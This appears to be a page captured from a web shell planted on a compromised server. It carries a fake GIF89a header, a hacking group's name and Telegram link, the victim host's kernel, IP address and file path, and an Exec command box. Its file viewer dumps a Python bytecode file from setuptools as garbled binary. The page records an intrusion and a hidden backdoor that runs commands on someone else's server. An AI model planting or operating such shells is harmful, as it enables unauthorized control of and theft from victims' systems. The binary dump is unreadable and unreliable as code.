GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
File Name : config.cpython-38.pyc
U �}�h�2 � @ s� d Z ddlmZ ddlZddlZddlZddlmZ ddlm Z ddl mZ ddlm Z dd lmZ d dd�ZG d d� de�Zddd�ZdS )a� distutils.command.config Implements the Distutils 'config' command, a (mostly) empty command class that exists mainly to be sub-classed by specific module distributions and applications. The idea is that while every "config" command is different, at least they're all named the same, and users always see "config" in the list of standard commands. Also, this is a good place to put common configure-like tasks: "try to compile this C code", or "figure out where this header file lives". � )�annotationsN)�Sequence)�log� )�Command)�DistutilsExecError)�customize_compilerz.cz.cxx)�czc++c @ s� e Zd ZdZdddddddd d g Zdd� Zd d� Zdd� Zdd� Zdd� Z dd� Z dd� Zdd� Zdd� Z d2dd �Zd3d!d"�Zd4d#d$�Zd5d%d&�Zd6d'd(�Zd7d*d+�Zdddg fd,d-�d.d/�Zd8d0d1�ZdS )9�configzprepare to build)z compiler=Nzspecify the compiler type)zcc=Nzspecify the compiler executable)z include-dirs=�Iz.list of directories to search for header files)zdefine=�DzC preprocessor macros to define)zundef=�Uz!C preprocessor macros to undefine)z libraries=�lz!external C libraries to link with)z library-dirs=�Lz.directories to search for external C libraries)�noisyNz1show every action (compile, link, run, ...) taken)zdump-sourceNz=dump generated source files before attempting to compile themc C s4 d | _ d | _d | _d | _d | _d| _d| _g | _d S )N� )�compiler�cc�include_dirs� libraries�library_dirsr �dump_source� temp_files��self� r �K/tmp/pip-target-k_nuic9h/lib/python/setuptools/_distutils/command/config.py�initialize_options1 s zconfig.initialize_optionsc C s� | j d kr| jj pg | _ nt| j t�r6| j �tj�| _ | jd krHg | _nt| jt�r^| jg| _| jd krpg | _nt| jt�r�| j�tj�| _d S �N) r �distribution� isinstance�str�split�os�pathsepr r r r r r �finalize_options@ s zconfig.finalize_optionsc C s d S r r r r r r �runP s z config.runc C sz ddl m}m} t| j|�sv|| j| jdd�| _t| j� | jrN| j�| j� | j rb| j� | j � | jrv| j�| j� dS )z^Check that 'self.compiler' really is a CCompiler object; if not, make it one. r )� CCompiler�new_compilerT)r �dry_run�forceN) � ccompilerr'